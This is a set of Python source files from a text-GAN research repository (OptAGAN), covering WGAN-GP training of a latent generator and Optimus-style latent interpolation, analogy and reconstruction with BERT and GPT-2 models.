train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | Egojr/optagan | optagan~run_latent_generation.py | #!/usr/bin/env python3
# coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Conditional text generation with the auto-regressive models of the library (GPT/GPT-2/Transformer-XL/XLNet)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import glob
import logging
import os
import pickle
import random
import torch
import torch.nn.functional as F
import numpy as np
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from modules import VAE
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
# Padding text to help Transformer-XL and XLNet with short prompts as proposed by Aman Rusia
# in https://github.com/rusiaaman/XLNet-gen#methodology
# and https://medium.com/@amanrusia/xlnet-speaks-comparison-to-gpt-2-ea1a4e9ba39e
PADDING_TEXT = """ In 1991, the remains of Russian Tsar Nicholas II and his family
(except for Alexei and Maria) are discovered.
The voice of Nicholas's young son, Tsarevich Alexei Nikolaevich, narrates the
remainder of the story. 1883 Western Siberia,
a young Grigori Rasputin is asked by his father and a group of men to perform magic.
Rasputin has a vision and denounces one of the men as a horse thief. Although his
father initially slaps him for making such an accusation, Rasputin watches as the
man is chased outside and beaten. Twenty years later, Rasputin sees a vision of
the Virgin Mary, prompting him to become a priest. Rasputin quickly becomes famous,
with people, even a bishop, begging for his blessing. <eod> </s> <eos>"""
def set_seed(args):
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def load_and_cache_examples(args, tokenizer, evaluate=False):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, file_path=args.eval_data_file if evaluate else args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, file_path=args.eval_data_file if evaluate else args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer, evaluate=False):
if isinstance(tokenizer, list):
if not evaluate:
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
else:
args.batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
file_path=args.eval_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=False)
else:
pass
return dataloader
def top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):
""" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering
Args:
logits: logits distribution shape (vocabulary size)
top_k > 0: keep only top k tokens with highest probability (top-k filtering).
top_p > 0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).
Nucleus filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751)
From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317
"""
assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear
top_k = min(top_k, logits.size(-1)) # Safety check
if top_k > 0:
# Remove all tokens with a probability less than the last token of the top-k
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probs > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(model, length, context, num_samples=1, temperature=1, top_k=0, top_p=0.0, is_xlnet=False, device='cpu'):
context = torch.tensor(context, dtype=torch.long, device=device)
context = context.unsqueeze(0).repeat(num_samples, 1)
generated = context
with torch.no_grad():
for _ in trange(length):
inputs = {'input_ids': generated}
if is_xlnet:
# XLNet is a direct (predict same token, not next token) and bi-directional model by default
# => need one additional dummy token in the input (will be masked), attention mask and target mapping (see model docstring)
input_ids = torch.cat((generated, torch.zeros((1, 1), dtype=torch.long, device=device)), dim=1)
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float, device=device)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float, device=device)
target_mapping[0, 0, -1] = 1.0 # predict last token
inputs = {'input_ids': input_ids, 'perm_mask': perm_mask, 'target_mapping': target_mapping}
outputs = model(**inputs) # Note: we could also use 'past' with GPT-2/Transfo-XL/XLNet (cached hidden-states)
next_token_logits = outputs[0][0, -1, :] / temperature
filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)
next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)
generated = torch.cat((generated, next_token.unsqueeze(0)), dim=1)
return generated
def sample_sequence_conditional(model, length, context, past=None, num_samples=1, temperature=1, top_k=0, top_p=0.0, device='cpu', decoder_tokenizer=None):
context = torch.tensor(context, dtype=torch.long, device=device)
context = context.unsqueeze(0).repeat(num_samples, 1)
generated = context
with torch.no_grad():
while True:
# for _ in trange(length):
inputs = {'input_ids': generated, 'past': past}
outputs = model(**inputs) # Note: we could also use 'past' with GPT-2/Transfo-XL/XLNet (cached hidden-states)
next_token_logits = outputs[0][0, -1, :] / temperature
filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)
next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)
generated = torch.cat((generated, next_token.unsqueeze(0)), dim=1)
# pdb.set_trace()
if next_token.unsqueeze(0)[0,0].item() == decoder_tokenizer.encode('<EOS>')[0]:
break
return generated
def latent_code_from_text(text, tokenizer_encoder, model_encoder, args):
tokenized1 = tokenizer_encoder.encode(text)
tokenized1 = [101] + tokenized1 + [102]
coded1 = torch.Tensor([tokenized1])
coded1 =torch.Tensor.long(coded1)
with torch.no_grad():
x0 = coded1
x0 = x0.to(args.device)
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
coded_length = len(tokenized1)
return latent_z, coded_length
def text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder):
past = latent_z
context_tokens = tokenizer_decoder.encode('<BOS>')
length = 128 # maximum length, but not used
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length= length, # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = tokenizer_decoder
)
text_x1 = tokenizer_decoder.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1)
return text_x1
# a wrapper function to choose between different play modes
def evaluate_latent_space(args, model_encoder, model_decoder, encoder_tokenizer, decoder_tokenizer, prefix=""):
eval_dataloader = build_dataload_and_cache_examples(args, [encoder_tokenizer, decoder_tokenizer], evaluate=False)
# Eval!
logger.info("***** Running recontruction evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataloader))
logger.info(" Batch size = %d", args.per_gpu_eval_batch_size)
model_encoder.eval()
model_decoder.eval()
# model_vae = model_vae.module if hasattr(model_vae, 'module') else model_vae # Take care of distributed/parallel training
if args.play_mode == 'reconstrction':
result = calc_rec(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=100)
result_file_name = "eval_recontruction_results.txt"
elif args.play_mode == 'interpolation':
result = calc_interpolate(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=100)
result_file_name = "eval_interpolation_results.txt"
else:
logger.info("Please specify the corrent play mode [reconstrction, interpolation]")
eval_output_dir = args.output_dir
output_eval_file = os.path.join(eval_output_dir, result_file_name)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval {} results *****".format(args.play_mode))
for key in sorted(result.keys()):
logger.info(" %s \n %s", key, str(result[key]))
writer.write("%s \n %s\n" % (key, str(result[key])))
return result
def calc_rec(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=1):
count = 0
result = defaultdict(str)
for batch in tqdm(eval_dataloader, desc="Evaluating recontruction"):
# pdb.set_trace()
x0, x1, x_lengths = batch
max_len_values, _ = x_lengths.max(0)
x0 = x0[:,:max_len_values[0]]
x1 = x1[:,:max_len_values[1]]
x0 = x0.to(args.device)
x1 = x1.to(args.device)
x_lengths = x_lengths.to(args.device)
context_tokens = decoder_tokenizer.encode('<BOS>')
with torch.no_grad():
text_x0 = encoder_tokenizer.decode(x0[0,:x_lengths[0,0]].tolist(), clean_up_tokenization_spaces=True)[0]
# result["INPUT TEXT " + str(count)].append(text_x0)
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
# Connect hidden feature to the latent space
# latent_z, loss_kl = model_vae.connect(pooled_hidden_fea)
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
past = latent_z
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length=x_lengths[0,1], # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = decoder_tokenizer
)
text_x1 = decoder_tokenizer.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1) + '\n'
result[text_x0] = text_x1
count += 1
if count>args.total_sents:
break
return result
def calc_interpolate(model_encoder, model_decoder, eval_dataloader, encoder_tokenizer, decoder_tokenizer, args, ns=1):
count = 0
latent_codes = []
sample_interval = 0
for batch in tqdm(eval_dataloader, desc="Evaluating interpolation"):
# pdb.set_trace()
x0, x1, x_lengths = batch
max_len_values, _ = x_lengths.max(0)
x0 = x0[:,:max_len_values[0]]
x0 = x0.to(args.device)
x_lengths = x_lengths.to(args.device)
with torch.no_grad():
if sample_interval == 0 or sample_interval == args.total_sents:
text_x0 = encoder_tokenizer.decode(x0[0,:x_lengths[0,0]].tolist(), clean_up_tokenization_spaces=True)[0]
pooled_hidden_fea = model_encoder(x0, attention_mask=(x0 > 0).float())[1]
# Connect hidden feature to the latent space
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
latent_z = mean.squeeze(1)
latent_codes.append(latent_z)
if sample_interval == 5:
latent_codes.append(latent_z)
sample_interval = 0
continue
else:
sample_interval += 1
continue
count += 1
if count>args.total_sents:
break
context_tokens = decoder_tokenizer.encode('<BOS>')
result = defaultdict(str)
latent_codes_interpolation = []
num_steps = args.num_interpolation_steps
for step in range(num_steps+1):
latent_z = latent_codes[0] + (latent_codes[1] - latent_codes[0]) * step * 1.0/num_steps
past = latent_z
out = sample_sequence_conditional(
model=model_decoder,
context=context_tokens,
past=past,
length=x_lengths[0,1], # Chunyuan: Fix length; or use <EOS> to complete a sentence
temperature=args.temperature,
top_k=args.top_k,
top_p=args.top_p,
device=args.device,
decoder_tokenizer = decoder_tokenizer
)
text_x1 = decoder_tokenizer.decode(out[0,:].tolist(), clean_up_tokenization_spaces=True)
text_x1 = text_x1.split()[1:-1]
text_x1 = ' '.join(text_x1)
result[step] = text_x1
return result
def interpolate(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args):
# and then in the main function
latent_z1, coded_length1 = latent_code_from_text(args.sent_source, tokenizer_encoder, model_encoder, args)
latent_z2, coded_length2 = latent_code_from_text(args.sent_target, tokenizer_encoder, model_encoder, args)
result = defaultdict(str)
num_steps = args.num_interpolation_steps + 1
for step in range(num_steps+1):
latent_z = latent_z1 + (latent_z2 - latent_z1) * step * 1.0/num_steps
text_interpolate = text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder)
result[step] = text_interpolate
print(text_interpolate)
return result
def analogy(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args):
latent_z1, coded_length1 = latent_code_from_text(args.sent_source, tokenizer_encoder, model_encoder, args)
latent_z2, coded_length2 = latent_code_from_text(args.sent_target, tokenizer_encoder, model_encoder, args)
latent_z3, coded_length3 = latent_code_from_text(args.sent_input, tokenizer_encoder, model_encoder, args)
result = defaultdict(str)
latent_z = latent_z3 + args.degree_to_target * (latent_z2 - latent_z1)
text_analogy = text_from_latent_code(latent_z, model_decoder, args, tokenizer_decoder)
result[0] = text_analogy
print(text_analogy)
return result
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--eval_data_file", default=None, type=str,
help="An input evaluation data file to evaluate the perplexity on (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
## Variational auto-encoder
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--total_sents", default=10, type=int, help="Total sentences to test recontruction.")
parser.add_argument("--num_interpolation_steps", default=10, type=int, help="Total sentences to test recontruction.")
parser.add_argument("--play_mode", default="interpolation", type=str,
help="interpolation or reconstruction.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--per_gpu_eval_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for evaluation.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
# Interact with users
parser.add_argument("--interact_with_user_input", action='store_true', help="Use user input to interact_with.")
parser.add_argument("--sent_source", type=str, default="")
parser.add_argument("--sent_target", type=str, default="")
parser.add_argument("--sent_input", type=str, default="")
parser.add_argument("--degree_to_target", type=float, default="1.0")
## Variational auto-encoder
parser.add_argument("--nz", default=32, type=int,
help="Latent space dimension.")
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--temperature", type=float, default=1.0)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--no_cuda", action='store_true',
help="Avoid using CUDA when available")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
args = parser.parse_args()
args.device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
set_seed(args)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
global_step = args.gloabl_step_eval
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
logger.info("Evaluate the following checkpoints: %s", checkpoints)
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Load full model
# output_full_dir = os.path.join(args.checkpoint_dir, 'checkpoint-full-{}'.format(global_step)) # Paolo
# checkpoint = torch.load(os.path.join(output_full_dir, 'training.bin'), map_location=torch.device('cpu')) # Paolo
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
print('We have added', num_added_toks, 'tokens to GPT2')
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
# Evaluation
# model_vae = VAE(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args) # Paolo
# model_vae.load_state_dict(checkpoint['model_state_dict']) # Paolo
# logger.info("Pre-trained Optimus is successfully loaded") # Paolo
# model_vae.to(args.device) # Paolo
if args.interact_with_user_input:
if args.play_mode == 'interpolation':
if len(args.sent_source) > 0 and len(args.sent_source) > 0:
result = interpolate(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args)
else:
print('Please check: specify the source and target sentences!')
if args.play_mode == 'analogy':
if len(args.sent_source) > 0 and len(args.sent_source) > 0 and len(args.sent_input) > 0:
result = analogy(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args)
else:
print('Please check: specify the source, target and input analogy sentences!')
else:
result = evaluate_latent_space(args, model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, prefix=global_step)
if __name__ == '__main__':
main()
| [] |
2024-01-10 | Egojr/optagan | optagan~wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from modules.gan import Generator, Critic
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
#grads = grads.view(B, -1)
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
c_optimizer.zero_grad()
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# train critic
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
# train generator
if i % args.n_critic == 0:
g_batches += 1
g_optimizer.zero_grad()
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
g_train_loss /= g_batches
c_train_loss /= len(train_loader)
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f}'.format(
epoch, g_train_loss, c_train_loss
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_critic', type=int, default=5, help="Number of critic updates before each generator update")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
